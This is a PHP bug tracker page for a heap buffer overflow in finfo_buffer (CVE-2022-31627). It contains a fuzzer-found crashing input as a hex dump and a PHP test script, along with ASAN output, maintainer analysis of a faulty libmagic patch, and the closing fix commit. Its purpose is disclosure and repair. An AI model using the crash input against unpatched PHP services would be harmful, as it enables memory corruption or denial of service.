PHP :: Sec Bug #81723 :: Heap buffer overflow in finfo

Sec Bug #81723	Heap buffer overflow in finfo_buffer
Submitted:	2022-06-27 22:59 UTC	Modified:	2022-07-05 07:05 UTC
From:	xd4rker at gmail dot com	Assigned:	stas (profile)
Status:	Closed	Package:	Filesystem function related
PHP Version:	8.1.7	OS:	Linux
Private report:	No	CVE-ID:	2022-31627

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	xd4rker at gmail dot com
New email:
PHP Version:		OS:

New Comment:

[2022-06-27 22:59 UTC] xd4rker at gmail dot com

Description:
------------
The following content is causing a heap-based buffer overflow in finfo_buffer. This was found using AFL++.

00000000  00 01 8a 75 70 00 10 97  db 97 97 98 97 97 7d 87  |...up.........}.|
00000010  97 97 97 00 00 92 00 1f  00 51 00 00 00 00 00 00  |.........Q......|
00000020  00 00 00 ff ff 7f ff 00  00 00 00 00 1e 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 0c 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  dc 00 00 00 01 00 00 00  |................|
00000050  00 00 00 00 00 4f 01 19  00 00 7f 00 00 00 00 00  |.....O..........|
00000060  18 00 39 00 00 00 00 00  00 00 00 00 00 00 00 00  |..9.............|
00000070  00 00 dc 00 00 00 01 00  00 00 00 00 00 00 00 4f  |...............O|
00000080  01 19 00 00 7f 00 00 f5  00 00 00 00 ee ff 00 00  |................|
00000090  00 00 00 00 00 00 01 00  00 fd 00                 |...........|

Tested against PHP >= 8.1.

ASAN output:

==4777==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e000000000 at pc 0x000000faba20 bp 0x7ffc087ab460 sp 0x7ffc087ab458
READ of size 8 at 0x60e000000000 thread T0
    #0 0xfaba1f in zend_mm_realloc_heap /home/user/php-src/Zend/zend_alloc.c:1561:3
    #1 0xfaba1f in _erealloc /home/user/php-src/Zend/zend_alloc.c:2582:9
    #2 0xa94368 in file_check_mem /home/user/php-src/ext/fileinfo/libmagic/funcs.c:623:14
    #3 0xa9f566 in match /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:458:9
    #4 0xaa2748 in file_softmagic /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:138:13
    #5 0xaa2748 in mget /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:1836:8
    #6 0xa9f04c in match /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:360:12
    #7 0xaa49b2 in mget /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:1885:8
    #8 0xa9f04c in match /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:360:12
    #9 0xa9e37e in file_softmagic /home/user/php-src/ext/fileinfo/libmagic/softmagic.c:138:13
    #10 0xa93762 in file_buffer /home/user/php-src/ext/fileinfo/libmagic/funcs.c:459:7
    #11 0xa98c42 in magic_buffer /home/user/php-src/ext/fileinfo/libmagic/magic.c:273:6
    #12 0xa6eb87 in _php_finfo_get_type /home/user/php-src/ext/fileinfo/fileinfo.c:346:23
    #13 0x12947cd in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/user/php-src/Zend/zend_vm_execute.h:1250:2
    #14 0x114f0a9 in execute_ex /home/user/php-src/Zend/zend_vm_execute.h:55687:7
    #15 0x114f93c in zend_execute /home/user/php-src/Zend/zend_vm_execute.h:60251:2
    #16 0x1071860 in zend_eval_stringl /home/user/php-src/Zend/zend_execute_API.c:1271:4
    #17 0x1071e15 in zend_eval_stringl_ex /home/user/php-src/Zend/zend_execute_API.c:1313:11
    #18 0x1071e15 in zend_eval_string_ex /home/user/php-src/Zend/zend_execute_API.c:1323:9
    #19 0x153f8ff in do_cli /home/user/php-src/sapi/cli/php_cli.c:998:5
    #20 0x153dae0 in main /home/user/php-src/sapi/cli/php_cli.c:1336:18
    #21 0x7f612802e082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082)
    #22 0x602b6d in _start (/home/user/php-src-8.1/sapi/cli/php+0x602b6d)

0x60e000000000 is located 64 bytes to the left of 154-byte region [0x60e000000040,0x60e0000000da)
allocated by thread T0 here:
    #0 0x667654 in strdup (/home/user/php-src-8.1/sapi/cli/php+0x667654)
    #1 0x15595a7 in save_ps_args /home/user/php-src/sapi/cli/ps_title.c:195:30

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/user/php-src/Zend/zend_alloc.c:1561:3 in zend_mm_realloc_heap
Shadow bytes around the buggy address:
  0x0c1c7fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1c7fff8000:[fa]fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c1c7fff8010: 00 00 00 00 00 00 00 00 00 00 00 02 fa fa fa fa
  0x0c1c7fff8020: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff8030: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c1c7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c7fff8050: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==4777==ABORTING

Test script:
---------------
<?php

$data = hex2bin("00018a7570001097db97979897977d87979797000092001f0051000000000000000000ffff7fff00000000001e0000000000000000000000000c0000000000000000000000000000dc0000000100000000000000004f011900007f0000000000180039000000000000000000000000000000dc0000000100000000000000004f011900007f0000f500000000eeff0000000000000000010000fd00");

$f = finfo_open();
finfo_buffer($f, $data);

Expected result:
----------------
MacBinary, total length 256, Mon Feb  6 06:28:16 2040 INVALID date, modified Fri Feb 24 11:23:37 2040, creator '    ', 20225 bytes "\212" , at 0x4f81 419430527 bytes resource

Actual result:
--------------
zend_mm_heap corrupted

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2022-06-28 15:13 UTC] cmb@php.net

-Package: *Graphics related +Package: Filesystem function related -Assigned To: +Assigned To: cmb

[2022-06-28 15:13 UTC] cmb@php.net

I can confirm the memory corruption, but that looks like a
libmagic issue (which may have been fixed in the meantime).

[2022-06-30 14:54 UTC] cmb@php.net

-Status: Assigned +Status: Analyzed

[2022-06-30 14:54 UTC] cmb@php.net

No, this is not an upstream issue, but rather caused by a bad
patch of libmagic 5.40 and affects PHP-8.1+; we try to
`erealloc()` memory which has been `malloc()`d.

[2022-06-30 15:32 UTC] cmb@php.net

Proposed patch: <https://gist.github.com/cmb69/90aba3c8ff8d42c5598e31846d259aa7>.
This includes updates to libmagic.patch, created by running ./generate_patch.sh.

Stas, can you please handle this?

[2022-06-30 15:37 UTC] cmb@php.net

-Assigned To: cmb +Assigned To: stas

[2022-06-30 22:13 UTC] stas@php.net

-CVE-ID: +CVE-ID: needed

[2022-07-05 06:37 UTC] stas@php.net

-CVE-ID: needed +CVE-ID: 2022-31627

[2022-07-05 07:05 UTC] git@php.net

Automatic comment on behalf of cmb69 (author) and smalyshev (committer)
Revision: https://github.com/php/php-src/commit/ca6d511fa54b34d5b75bf120a86482a1b9e1e686
Log: Fix #81723: Memory corruption in finfo_buffer()

[2022-07-05 07:05 UTC] git@php.net

-Status: Analyzed +Status: Closed

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu Nov 21 10:01:29 2024 UTC